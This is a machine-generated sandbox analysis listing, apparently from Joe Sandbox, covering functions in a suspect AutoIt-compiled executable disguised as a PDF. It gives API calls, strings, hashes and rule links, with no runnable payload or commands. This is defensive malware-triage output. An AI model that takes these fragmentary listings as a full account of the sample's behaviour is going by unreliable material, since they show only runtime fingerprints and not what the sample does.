                                                    • Opcode Fuzzy Hash: 3f1855f2312128b6081f0bb2b52b682dbc1314f985e89dc0dc564d43c59a904c
                                                    • Instruction Fuzzy Hash: CAA13D71A40215BFEB15DFA9DD4AFAEBBA9EB04710F004115FA15EB2E0D7B0AD40CB64
                                                    Function 0038DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038DBD6
                                                    • GetDriveTypeW.KERNEL32(?,003DDC54,?,\\.\,003DDC00), ref: 0038DCC3
                                                    • SetErrorMode.KERNEL32(00000000,003DDC54,?,\\.\,003DDC00), ref: 0038DE29
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: 9912ca1aa313036f64d337dd5c83fb8e4cc6f5c1e546277dcdc2ea451e5b9334
                                                    • Instruction ID: cf7f2e8e7e5f194033834595aa27f857ab3fb6b08c41a637c32d044737ca2b00
                                                    • Opcode Fuzzy Hash: 9912ca1aa313036f64d337dd5c83fb8e4cc6f5c1e546277dcdc2ea451e5b9334
                                                    • Instruction Fuzzy Hash: 2B519F30248306AB8613FF11C8A28B9B7A4FF94701F24599AF5079F6E5DB60ED49DB42
                                                    Function 0034CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-86951937
                                                    • Opcode ID: 376a486b56faa44feee34b1cf5b9bb6fd3488671c6228a105510aed2acfa267a
                                                    • Instruction ID: e4142bd5caf041f7a3e45fc60a2a8f2da9c1b942794d1259e0ebee72515afa8d
                                                    • Opcode Fuzzy Hash: 376a486b56faa44feee34b1cf5b9bb6fd3488671c6228a105510aed2acfa267a
                                                    • Instruction Fuzzy Hash: A4812731641209BBCB63AE64DC82FFF77A9EF15304F049125FA05AF5CAEB60E905C291
                                                    Function 003A638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,003DDC00), ref: 003A6449
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 3964851224-45149045
                                                    • Opcode ID: 2a00edc7ee960d881ad86e091d21f841186f5ba9f9ba23e34f7317b7603d7629
                                                    • Instruction ID: 97e137ba21a01f43c48c4d887496b7afd8e5bb568f2194f96c877290e36e70e7
                                                    • Opcode Fuzzy Hash: 2a00edc7ee960d881ad86e091d21f841186f5ba9f9ba23e34f7317b7603d7629
                                                    • Instruction Fuzzy Hash: 4BC1A1342042158BCB17EF10C552E6EB7E9EF96344F094858F8965F2B2DB25EE4ACB42
                                                    Function 003AD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 003AD5AE
                                                    • SetTextColor.GDI32(?,?), ref: 003AD5B2
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003AD5C8
                                                    • GetSysColor.USER32(0000000F), ref: 003AD5D3
                                                    • CreateSolidBrush.GDI32(?), ref: 003AD5D8
                                                    • GetSysColor.USER32(00000011), ref: 003AD5F0
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AD5FE
                                                    • SelectObject.GDI32(?,00000000), ref: 003AD60F
                                                    • SetBkColor.GDI32(?,00000000), ref: 003AD618
                                                    • SelectObject.GDI32(?,?), ref: 003AD625
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003AD644
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AD65B
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003AD670
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AD698
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003AD6BF
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 003AD6DD
                                                    • DrawFocusRect.USER32(?,?), ref: 003AD6E8
                                                    • GetSysColor.USER32(00000011), ref: 003AD6F6
                                                    • SetTextColor.GDI32(?,00000000), ref: 003AD6FE
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003AD712
                                                    • SelectObject.GDI32(?,003AD2A5), ref: 003AD729
                                                    • DeleteObject.GDI32(?), ref: 003AD734
                                                    • SelectObject.GDI32(?,?), ref: 003AD73A
                                                    • DeleteObject.GDI32(?), ref: 003AD73F
                                                    • SetTextColor.GDI32(?,?), ref: 003AD745
                                                    • SetBkColor.GDI32(?,?), ref: 003AD74F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: e65657d73076233427a5d18886541e49ce51c6def1c8a9d09f07e7e753f767ed
                                                    • Instruction ID: e4e454884cb07f9d8975261b7b2dd10c0ada7fcf2f02fe52f605fc84fc7606dc
                                                    • Opcode Fuzzy Hash: e65657d73076233427a5d18886541e49ce51c6def1c8a9d09f07e7e753f767ed
                                                    • Instruction Fuzzy Hash: 44513B71900218AFDB129FA8DC48EAEBB79FB09324F154525F916EB2A1D771AA40CF50
                                                    Function 003AB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003AB7B0
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003AB7C1
                                                    • CharNextW.USER32(0000014E), ref: 003AB7F0
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003AB831
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003AB847
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003AB858
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003AB875
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 003AB8C7
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003AB8DD
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003AB90E
                                                    • _memset.LIBCMT ref: 003AB933
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003AB97C
                                                    • _memset.LIBCMT ref: 003AB9DB
                                                    • SendMessageW.USER32 ref: 003ABA05
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 003ABA5D
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 003ABB0A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003ABB2C
                                                    • GetMenuItemInfoW.USER32(?), ref: 003ABB76
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003ABBA3
                                                    • DrawMenuBar.USER32(?), ref: 003ABBB2
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 003ABBDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: 88bedbbfa7d3d28bde714ca07456b7cc932a872466842e9165e25b3a068f3b86
                                                    • Instruction ID: 714feefb2316ca498c89e77c9f122541ea27b82f197cedc9d0a6462d59663963
                                                    • Opcode Fuzzy Hash: 88bedbbfa7d3d28bde714ca07456b7cc932a872466842e9165e25b3a068f3b86
                                                    • Instruction Fuzzy Hash: 24E1A071900218AFDF129FA5CC84EEEBB7CFF06714F10816AF919AA192D7759A41CF60
                                                    Function 00342EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Foreground
                                                    • String ID: ACTIVE$ALL$CLASS$H+?$HANDLE$INSTANCE$L+?$LAST$P+?$REGEXPCLASS$REGEXPTITLE$T+?$TITLE
                                                    • API String ID: 62970417-157867648
                                                    • Opcode ID: 8d537ea4e3639331f2a0eb80ef36e9d252a45e35ea6ac9d22327d503bd479ada
                                                    • Instruction ID: 1520f3261fa60d5f09bdcce4877ea6090edaf3b500b79eaf3a5036cb4ba45563
                                                    • Opcode Fuzzy Hash: 8d537ea4e3639331f2a0eb80ef36e9d252a45e35ea6ac9d22327d503bd479ada
                                                    • Instruction Fuzzy Hash: C0D184305086469BCB07EF10C4819EBBBF4BF54348F504A19F95A9F9A1DB30F99ACB91
                                                    Function 003A764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 003A778A
                                                    • GetDesktopWindow.USER32 ref: 003A779F
                                                    • GetWindowRect.USER32(00000000), ref: 003A77A6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A7808
                                                    • DestroyWindow.USER32(?), ref: 003A7834
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003A785D
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003A787B
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003A78A1
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 003A78B6
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003A78C9
                                                    • IsWindowVisible.USER32(?), ref: 003A78E9
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003A7904
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003A7918
                                                    • GetWindowRect.USER32(?,?), ref: 003A7930
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 003A7956
                                                    • GetMonitorInfoW.USER32 ref: 003A7970
                                                    • CopyRect.USER32(?,?), ref: 003A7987
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 003A79F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: f36bc88da0c808741a71d6111c04c7fb68f2d90915bd09b215abb230dc57b395
                                                    • Instruction ID: 995399b566d8b35c13ad8fd5683c7981b9e473cb6e5471d01f55ed232eaaa833
                                                    • Opcode Fuzzy Hash: f36bc88da0c808741a71d6111c04c7fb68f2d90915bd09b215abb230dc57b395
                                                    • Instruction Fuzzy Hash: B1B18F71608300AFD706DF64CD89B6ABBE8FF89310F008A1DF5999B291D774E805CB91
                                                    Function 0035A856 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0035A939
                                                    • GetSystemMetrics.USER32(00000007), ref: 0035A941
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0035A96C
                                                    • GetSystemMetrics.USER32(00000008), ref: 0035A974
                                                    • GetSystemMetrics.USER32(00000004), ref: 0035A999
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0035A9B6
                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0035A9C6
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0035A9F9
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0035AA0D
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 0035AA2B
                                                    • GetStockObject.GDI32(00000011), ref: 0035AA47
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0035AA52
                                                      • Part of subcall function 0035B63C: GetCursorPos.USER32(000000FF), ref: 0035B64F
                                                      • Part of subcall function 0035B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0035B66C
                                                      • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000001), ref: 0035B691
                                                      • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000002), ref: 0035B69F
                                                    • SetTimer.USER32(00000000,00000000,00000028,0035AB87), ref: 0035AA79
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI$T.?
                                                    • API String ID: 1458621304-528744971
                                                    • Opcode ID: 9070007c45f26d3d5cfdf786a4cf5899bab599345bcc4b0abb1dfe668013abf3
                                                    • Instruction ID: e7f06b4c6e7486d52aa2978f913bdd9ebaff8b7947ac020ab25c0cfee2af9d8f
                                                    • Opcode Fuzzy Hash: 9070007c45f26d3d5cfdf786a4cf5899bab599345bcc4b0abb1dfe668013abf3
                                                    • Instruction Fuzzy Hash: E5B16A71A0020A9FDB16DFA8DD45FEE7BA8EB08315F114229FA15E72A0DB74E840CB55
                                                    Function 003A3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A3735
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,003DDC00,00000000,?,00000000,?,?), ref: 003A37A3
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003A37EB
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003A3874
                                                    • RegCloseKey.ADVAPI32(?), ref: 003A3B94
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A3BA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: f52927d55df4560a87690a1afd992c1bc4ba7115a28eb19002e2e04fb4223d84
                                                    • Instruction ID: 857f2c6de29c17f4b0d71bdc74fd1da7883173eb41765f74bcab4562785143ad
                                                    • Opcode Fuzzy Hash: f52927d55df4560a87690a1afd992c1bc4ba7115a28eb19002e2e04fb4223d84
                                                    • Instruction Fuzzy Hash: A80237756046019FCB16EF14C851E2AB7E9FF8A720F05845DF99A9F2A2CB30ED01CB81
                                                    Function 003A6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 003A6C56
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003A6D16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: 3d2b1a2dcb23c18d39a81a753d57928218851f9e0b28f015ff7caa1bbf05b776
                                                    • Instruction ID: c44d1d38829a9b567b955afdf4672e5f4c6d849eec5010892bdb2cd9dc6cd4ea
                                                    • Opcode Fuzzy Hash: 3d2b1a2dcb23c18d39a81a753d57928218851f9e0b28f015ff7caa1bbf05b776
                                                    • Instruction Fuzzy Hash: AEA17D342042419FCB16EF20C952E6BB3A5EF45354F148969F9969F3A2DB70ED09CB41
                                                    Function 0037CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0037CF91
                                                    • __swprintf.LIBCMT ref: 0037D032
                                                    • _wcscmp.LIBCMT ref: 0037D045
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0037D09A
                                                    • _wcscmp.LIBCMT ref: 0037D0D6
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0037D10D
                                                    • GetDlgCtrlID.USER32(?), ref: 0037D15F
                                                    • GetWindowRect.USER32(?,?), ref: 0037D195
                                                    • GetParent.USER32(?), ref: 0037D1B3
                                                    • ScreenToClient.USER32(00000000), ref: 0037D1BA
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0037D234
                                                    • _wcscmp.LIBCMT ref: 0037D248
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0037D26E
                                                    • _wcscmp.LIBCMT ref: 0037D282
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                    • String ID: %s%u
                                                    • API String ID: 3119225716-679674701
                                                    • Opcode ID: 7e25dd6062efbc9244375425cccd3d574b9187a2e2d61b8a0e42e50d78ea767b
                                                    • Instruction ID: 0b8f76c16437af52a52560acc03b6ca6f295bc201bbd435b8cae06382826cd4b
                                                    • Opcode Fuzzy Hash: 7e25dd6062efbc9244375425cccd3d574b9187a2e2d61b8a0e42e50d78ea767b
                                                    • Instruction Fuzzy Hash: 0CA1CF31204306AFD726DF64C884FAAB7E8FF44314F008929F99DD6191EB34EA56CB91
                                                    Function 0037D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0037D8EB
                                                    • _wcscmp.LIBCMT ref: 0037D8FC
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0037D924
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0037D941
                                                    • _wcscmp.LIBCMT ref: 0037D95F
                                                    • _wcsstr.LIBCMT ref: 0037D970
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0037D9A8
                                                    • _wcscmp.LIBCMT ref: 0037D9B8
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0037D9DF
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0037DA28
                                                    • _wcscmp.LIBCMT ref: 0037DA38
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0037DA60
                                                    • GetWindowRect.USER32(00000004,?), ref: 0037DAC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: f36a2003cbe0df3b0afcd52426ed14c71b07378a7130eaf592e39a3fdf2cd2ff
